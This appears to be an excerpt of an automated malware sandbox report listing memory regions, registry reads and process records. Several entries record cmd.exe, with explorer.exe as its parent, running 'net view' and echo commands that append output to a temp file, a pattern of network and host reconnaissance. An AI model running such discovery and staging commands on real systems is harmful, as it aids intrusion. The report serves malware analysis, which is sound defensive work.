pagefile_0x0000005eb01c0000 0x5eb01c0000 0x5eb01c0fff Pagefile Backed Memory r True False False -
private_0x0000005eb0230000 0x5eb0230000 0x5eb023ffff Private Memory rw True False False -
pagefile_0x0000005eb0240000 0x5eb0240000 0x5eb03c7fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eb03d0000 0x5eb03d0000 0x5eb0550fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eb0560000 0x5eb0560000 0x5eb195ffff Pagefile Backed Memory r True False False -
sortdefault.nls 0x5eb1960000 0x5eb1c96fff Memory Mapped File r False False False -
private_0x0000005eb1ca0000 0x5eb1ca0000 0x5eb1d1ffff Private Memory rw True False False -
private_0x0000005eb1d20000 0x5eb1d20000 0x5eb1d9ffff Private Memory rw True False False -
private_0x0000005eb1da0000 0x5eb1da0000 0x5eb1e1ffff Private Memory rw True False False -
pagefile_0x00007df5ff700000 0x7df5ff700000 0x7ff5ff6fffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff698fe0000 0x7ff698fe0000 0x7ff6990dffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff6990e0000 0x7ff6990e0000 0x7ff699102fff Pagefile Backed Memory r True False False -
private_0x00007ff699105000 0x7ff699105000 0x7ff699106fff Private Memory rw True False False -
private_0x00007ff699107000 0x7ff699107000 0x7ff699108fff Private Memory rw True False False -
private_0x00007ff699109000 0x7ff699109000 0x7ff69910afff Private Memory rw True False False -
private_0x00007ff69910b000 0x7ff69910b000 0x7ff69910cfff Private Memory rw True False False -
private_0x00007ff69910d000 0x7ff69910d000 0x7ff69910efff Private Memory rw True False False -
private_0x00007ff69910f000 0x7ff69910f000 0x7ff69910ffff Private Memory rw True False False -
systeminfo.exe 0x7ff6997d0000 0x7ff6997ecfff Memory Mapped File rwx False False False -
wbemsvc.dll 0x7ff96b4a0000 0x7ff96b4b3fff Memory Mapped File rwx False False False -
fastprox.dll 0x7ff96b7d0000 0x7ff96b8c7fff Memory Mapped File rwx False False False -
wbemprox.dll 0x7ff96c2d0000 0x7ff96c2e0fff Memory Mapped File rwx False False False -
version.dll 0x7ff96c360000 0x7ff96c369fff Memory Mapped File rwx False False False -
wbemcomn.dll 0x7ff96df20000 0x7ff96df9efff Memory Mapped File rwx False False False -
framedynos.dll 0x7ff9722a0000 0x7ff9722edfff Memory Mapped File rwx False False False -
mpr.dll 0x7ff973b90000 0x7ff973babfff Memory Mapped File rwx False False False -
rsaenh.dll 0x7ff973e20000 0x7ff973e52fff Memory Mapped File rwx False False False -
cryptsp.dll 0x7ff9741d0000 0x7ff9741e6fff Memory Mapped File rwx False False False -
cryptbase.dll 0x7ff974340000 0x7ff97434afff Memory Mapped File rwx False False False -
sspicli.dll 0x7ff974520000 0x7ff97454bfff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x7ff974720000 0x7ff97478afff Memory Mapped File rwx False False False -
bcrypt.dll 0x7ff9748a0000 0x7ff9748c7fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x7ff9749a0000 0x7ff9749aefff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
nsi.dll 0x7ff976f70000 0x7ff976f77fff Memory Mapped File rwx False False False -
advapi32.dll 0x7ff976f80000 0x7ff977025fff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
shlwapi.dll 0x7ff977360000 0x7ff9773b0fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
oleaut32.dll 0x7ff977760000 0x7ff97781dfff Memory Mapped File rwx False False False -
combase.dll 0x7ff977830000 0x7ff977aabfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ws2_32.dll 0x7ff977cb0000 0x7ff977d18fff Memory Mapped File rwx False False False -
clbcatq.dll 0x7ff977d40000 0x7ff977de4fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Process #23: cmd.exe
62 0
»
Information Value
ID #23
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:23, Reason: Child Process
Unmonitor End Time: 00:04:23, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x198
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B40
0x 97C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000009343980000 0x9343980000 0x934399ffff Private Memory rw True False False -
pagefile_0x0000009343980000 0x9343980000 0x934398ffff Pagefile Backed Memory rw True False False -
private_0x0000009343990000 0x9343990000 0x9343996fff Private Memory rw True False False -
pagefile_0x00000093439a0000 0x93439a0000 0x93439b3fff Pagefile Backed Memory r True False False -
private_0x00000093439c0000 0x93439c0000 0x9343abffff Private Memory rw True False False -
pagefile_0x0000009343ac0000 0x9343ac0000 0x9343ac3fff Pagefile Backed Memory r True False False -
pagefile_0x0000009343ad0000 0x9343ad0000 0x9343ad0fff Pagefile Backed Memory r True False False -
private_0x0000009343ae0000 0x9343ae0000 0x9343ae1fff Private Memory rw True False False -
locale.nls 0x9343af0000 0x9343badfff Memory Mapped File r False False False -
private_0x0000009343bb0000 0x9343bb0000 0x9343caffff Private Memory rw True False False -
private_0x0000009343cb0000 0x9343cb0000 0x9343daffff Private Memory rw True False False -
private_0x0000009343db0000 0x9343db0000 0x9343db6fff Private Memory rw True False False -
private_0x0000009343f10000 0x9343f10000 0x9343f1ffff Private Memory rw True False False -
pagefile_0x00007df5ff2b0000 0x7df5ff2b0000 0x7ff5ff2affff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60d790000 0x7ff60d790000 0x7ff60d88ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60d890000 0x7ff60d890000 0x7ff60d8b2fff Pagefile Backed Memory r True False False -
private_0x00007ff60d8bb000 0x7ff60d8bb000 0x7ff60d8bcfff Private Memory rw True False False -
private_0x00007ff60d8bd000 0x7ff60d8bd000 0x7ff60d8befff Private Memory rw True False False -
private_0x00007ff60d8bf000 0x7ff60d8bf000 0x7ff60d8bffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (24)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 2
Fn
Get Info STD_OUTPUT_HANDLE type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 12
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 11 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #25: cmd.exe
67 0
»
Information Value
ID #25
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "net view >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:23, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0x978
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B10
0x F0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000002a32480000 0x2a32480000 0x2a3249ffff Private Memory rw True False False -
pagefile_0x0000002a32480000 0x2a32480000 0x2a3248ffff Pagefile Backed Memory rw True False False -
private_0x0000002a32490000 0x2a32490000 0x2a32496fff Private Memory rw True False False -
pagefile_0x0000002a324a0000 0x2a324a0000 0x2a324b3fff Pagefile Backed Memory r True False False -
private_0x0000002a324c0000 0x2a324c0000 0x2a325bffff Private Memory rw True False False -
pagefile_0x0000002a325c0000 0x2a325c0000 0x2a325c3fff Pagefile Backed Memory r True False False -
pagefile_0x0000002a325d0000 0x2a325d0000 0x2a325d0fff Pagefile Backed Memory r True False False -
private_0x0000002a325e0000 0x2a325e0000 0x2a325e1fff Private Memory rw True False False -
locale.nls 0x2a325f0000 0x2a326adfff Memory Mapped File r False False False -
private_0x0000002a326b0000 0x2a326b0000 0x2a326b6fff Private Memory rw True False False -
private_0x0000002a32760000 0x2a32760000 0x2a3285ffff Private Memory rw True False False -
private_0x0000002a32860000 0x2a32860000 0x2a3295ffff Private Memory rw True False False -
private_0x0000002a32a60000 0x2a32a60000 0x2a32a6ffff Private Memory rw True False False -
sortdefault.nls 0x2a32a70000 0x2a32da6fff Memory Mapped File r False False False -
pagefile_0x00007df5ff630000 0x7df5ff630000 0x7ff5ff62ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60ce70000 0x7ff60ce70000 0x7ff60cf6ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60cf70000 0x7ff60cf70000 0x7ff60cf92fff Pagefile Backed Memory r True False False -
private_0x00007ff60cf97000 0x7ff60cf97000 0x7ff60cf97fff Private Memory rw True False False -
private_0x00007ff60cf9c000 0x7ff60cf9c000 0x7ff60cf9dfff Private Memory rw True False False -
private_0x00007ff60cf9e000 0x7ff60cf9e000 0x7ff60cf9ffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (20)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 10
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\net.exe os_pid = 0x84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000002 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #27: net.exe
0 0
»
Information Value
ID #27
File Name c:\windows\system32\net.exe
Command Line net view
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:23, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x84
Parent PID 0x978 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4BC
0x 4A8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000003551ed0000 0x3551ed0000 0x3551eeffff Private Memory rw True False False -
pagefile_0x0000003551ed0000 0x3551ed0000 0x3551edffff Pagefile Backed Memory rw True False False -
private_0x0000003551ee0000 0x3551ee0000 0x3551ee6fff Private Memory rw True False False -
pagefile_0x0000003551ef0000 0x3551ef0000 0x3551f03fff Pagefile Backed Memory r True False False -
private_0x0000003551f10000 0x3551f10000 0x3551f8ffff Private Memory rw True False False -
pagefile_0x0000003551f90000 0x3551f90000 0x3551f93fff Pagefile Backed Memory r True False False -
pagefile_0x0000003551fa0000 0x3551fa0000 0x3551fa0fff Pagefile Backed Memory r True False False -
private_0x0000003551fb0000 0x3551fb0000 0x3551fb1fff Private Memory rw True False False -
locale.nls 0x3551fc0000 0x355207dfff Memory Mapped File r False False False -
private_0x0000003552080000 0x3552080000 0x3552086fff Private Memory rw True False False -
netmsg.dll 0x3552090000 0x3552092fff Memory Mapped File rwx False False False -
netmsg.dll.mui 0x35520a0000 0x35520d1fff Memory Mapped File r False False False -
private_0x00000035520e0000 0x35520e0000 0x35521dffff Private Memory rw True False False -
private_0x00000035521e0000 0x35521e0000 0x355225ffff Private Memory rw True False False -
private_0x00000035523c0000 0x35523c0000 0x35523cffff Private Memory rw True False False -
pagefile_0x00007df5ff4a0000 0x7df5ff4a0000 0x7ff5ff49ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff74e680000 0x7ff74e680000 0x7ff74e77ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff74e780000 0x7ff74e780000 0x7ff74e7a2fff Pagefile Backed Memory r True False False -
private_0x00007ff74e7a4000 0x7ff74e7a4000 0x7ff74e7a4fff Private Memory rw True False False -
private_0x00007ff74e7ac000 0x7ff74e7ac000 0x7ff74e7adfff Private Memory rw True False False -
private_0x00007ff74e7ae000 0x7ff74e7ae000 0x7ff74e7affff Private Memory rw True False False -
net.exe 0x7ff74ea20000 0x7ff74ea3cfff Memory Mapped File rwx False False False -
cscapi.dll 0x7ff96cc10000 0x7ff96cc21fff Memory Mapped File rwx False False False -
wkscli.dll 0x7ff970e80000 0x7ff970e95fff Memory Mapped File rwx False False False -
samcli.dll 0x7ff9710a0000 0x7ff9710b7fff Memory Mapped File rwx False False False -
winnsi.dll 0x7ff971f40000 0x7ff971f4afff Memory Mapped File rwx False False False -
iphlpapi.dll 0x7ff971f50000 0x7ff971f87fff Memory Mapped File rwx False False False -
browcli.dll 0x7ff972270000 0x7ff972283fff Memory Mapped File rwx False False False -
mpr.dll 0x7ff973b90000 0x7ff973babfff Memory Mapped File rwx False False False -
srvcli.dll 0x7ff973bb0000 0x7ff973bd5fff Memory Mapped File rwx False False False -
netutils.dll 0x7ff973be0000 0x7ff973bebfff Memory Mapped File rwx False False False -
bcrypt.dll 0x7ff9748a0000 0x7ff9748c7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
nsi.dll 0x7ff976f70000 0x7ff976f77fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Process #29: cmd.exe
62 0
»
Information Value
ID #29
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x86c
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 53C
0x 120
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000b4ee2d0000 0xb4ee2d0000 0xb4ee2effff Private Memory rw True False False -
pagefile_0x000000b4ee2d0000 0xb4ee2d0000 0xb4ee2dffff Pagefile Backed Memory rw True False False -
private_0x000000b4ee2e0000 0xb4ee2e0000 0xb4ee2e6fff Private Memory rw True False False -
pagefile_0x000000b4ee2f0000 0xb4ee2f0000 0xb4ee303fff Pagefile Backed Memory r True False False -
private_0x000000b4ee310000 0xb4ee310000 0xb4ee40ffff Private Memory rw True False False -
pagefile_0x000000b4ee410000 0xb4ee410000 0xb4ee413fff Pagefile Backed Memory r True False False -
pagefile_0x000000b4ee420000 0xb4ee420000 0xb4ee420fff Pagefile Backed Memory r True False False -
private_0x000000b4ee430000 0xb4ee430000 0xb4ee431fff Private Memory rw True False False -
locale.nls 0xb4ee440000 0xb4ee4fdfff Memory Mapped File r False False False -
private_0x000000b4ee500000 0xb4ee500000 0xb4ee506fff Private Memory rw True False False -
private_0x000000b4ee550000 0xb4ee550000 0xb4ee64ffff Private Memory rw True False False -
private_0x000000b4ee650000 0xb4ee650000 0xb4ee74ffff Private Memory rw True False False -
private_0x000000b4ee860000 0xb4ee860000 0xb4ee86ffff Private Memory rw True False False -
pagefile_0x00007df5fff70000 0x7df5fff70000 0x7ff5fff6ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60d650000 0x7ff60d650000 0x7ff60d74ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60d750000 0x7ff60d750000 0x7ff60d772fff Pagefile Backed Memory r True False False -
private_0x00007ff60d778000 0x7ff60d778000 0x7ff60d778fff Private Memory rw True False False -
private_0x00007ff60d77c000 0x7ff60d77c000 0x7ff60d77dfff Private Memory rw True False False -
private_0x00007ff60d77e000 0x7ff60d77e000 0x7ff60d77ffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (24)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 2
Fn
Get Info STD_OUTPUT_HANDLE type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 12
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 11 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
